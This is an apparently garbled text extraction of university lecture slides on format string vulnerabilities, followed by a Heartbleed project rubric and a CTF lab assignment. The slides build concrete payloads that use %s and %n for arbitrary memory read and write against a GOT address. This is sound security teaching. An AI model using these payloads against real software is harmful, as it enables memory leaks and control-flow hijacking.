Format String Vulnerability 2 Yeongjin Jang 030618 Format
Format String Vulnerability -2 Yeongjin Jang 03/06/18
Format String Vulnerability • Useful directives • %x – print an argument as a hexadecimal value • %d – print an argument as a decimal value • %p – print an argument as a hexadecimal value with prefix 0 x • %s – print an argument as a string; read the data in the address • %n – treat an argument as an address, write the number of printed bytes…
Format String Syntax • %1$08 d • %[argument_position]$[length][parameter] • Meaning • Print an integer as a decimal value • Justify its length to length • Get the value from n-th argument • Print 8 -length decimal integer, with the value at the 1 st argument (padded with 0)
Arbitrary Read via FSV • In format-string-1 • %p %p …. • Why?
RETURN ADDR Arbitrary Read via FSV • The buffer is on the stack SAVED %ebp %p % 0 x 4 c • Your input can also be treated as an argument %p p %p %p % • Can you exploit this to perform arbitrary read via FSV? random 6 th variable 5 th RESV 4 th RESV 3 rd RESV 2 nd Arg 1 of printf
RETURN ADDR Arbitrary Read via FSV (%s) • Put address to read on the stack SAVED %ebp XXXX 0 x 4 c • Suppose the address is 0 x 804 a 010 (GOT of printf) XXXX %7$s 0 x 804 a 010 • Prepare the string input • “x 10xa 0x 04x 08%7$x” (print 0 x 804 a 010, test it first) • “x 10xa 0x 04x 08%7$s” (read the data!) • Use struct. unpack(“I”, …) to change the string to an integer random 6 th variable 5 th RESV 4 th RESV 3 rd RESV 2 nd Arg 1 of printf
Arbitrary Read via FSV (%s) • Capability • Can read “string” data in the address • Read terminates when it meets “x 00” • Tricks to read more… • “x 10xa 0x 04x 08x 11xa 0x 04x 08x 12xa 0x 04x 08x 13xa 0x 04x 08” • “%7$s|%8$s|%9$s|%10$s” • You will get values separated by | (observing || means that it is a null string) • E. g. , 1|2||3 then the value will be “ 12x 003”
RETURN ADDR Arbitrary Write via FSV (%n) • Put address to read on the stack • Suppose the address is 0 x 804 a 010 (GOT of printf) SAVED %ebp XXXX 0 x 4 c XXXX %7$s 0 x 804 a 010 • Prepare the string input • “x 10xa 0x 04x 08%7$x” (print 0 x 804 a 010, test it first) • “x 10xa 0x 04x 08%7$n” (write the data!) • Write 4, because it has printed “x 10xa 0x 04x 08” before the %7$n parameter random 6 th variable 5 th RESV 4 th RESV 3 rd RESV 2 nd Arg 1 of printf
Arbitrary Write via FSV (%n) • Can you write arbitrary values? Not just 4? • %10 x – prints 10 characters regardless the value of arugment • %10000 x – prints 10000 … • %1073741824 x – prints 2^30 characters … • How to write 0 xfaceb 00 c? • %4207489484 x • NO….
Arbitrary Write via FSV (%n) • Challenges… • Printing 4 billion characters is super SLOW… • Remote attack – you need to download 4 GB… • What about 64 bit machines – 48 bit addresses? • A trick • Split write into multiple times (2 times, 4 times, etc. )
Arbitrary Write via FSV (%n) • Writing 0 xfaceb 00 c to 0 x 804 a 010 • Prepare two addresses as arguments • “x 10xa 0x 04x 08x 12xa 0x 04x 08” • Printed 8 bytes • Write 0 xb 00 c at 0 x 0804 a 010 [ % (0 xb 00 c-8) n] • This will write 4 bytes, 0 x 0000 b 00 c at 0 x 804 a 010 ~ 0 x 804 a 014 • Write 0 xface at 0 x 804 a 012 [ % (0 xface – 0 xb 00 c) n] • This will write 4 bytes, 0 x 0000 face at 0 x 804 a 012 ~ 0 x 804 a 016 • What about 0 x 0000 at 0 x 804 a 014~0 x 804 a 016? • We do not care…
Arbitrary Write via FSV (%n) • Can we overwrite 0 x 12345678? • Write 0 x 5678 to the address • % (0 x 5678 – 8) n • Write 0 x 1234 to the (address + 2) • % (0 x 1234 – 0 x 5678) n • % (0 x 011234 – 0 x 5678) n • “x 10xa 0x 04x 08x 12xa 0x 04x 08%22128 x%7$n%48060 x%8$n
Project Presentation • Evaluation criteria – Heartbleed vulnerability analysis • What have you learned from the project? • Open. SSL, heartbeat protocol, etc. • Vulnerability was there for several years -> such vuln is hard to detect! • Can you link what you have learned from the class to the project? • Information leak – arbitrary read; could break ASLR, steal secret value (cookie), etc. • Demo • Impact / Implication / Take Away • Leaked several private keys from important servers (Yahoo, etc. ) • Vulnerability in a library is more dangerous because it is used by many apps… • Write a secure code that checks the size boundary of the buffer
Assignment: Week-8 • Please solve challenges in the /home/labs/week 8 directory • Some are in VM-CTF 1 and some are in VM-CTF 3 (ASLR-enabled) • Get flags from programs in the challeges directory • You can attach gdb to these programs, but your exploit must work without attaching gdb. • Due: 3/16 11: 59 am
- Slides: 14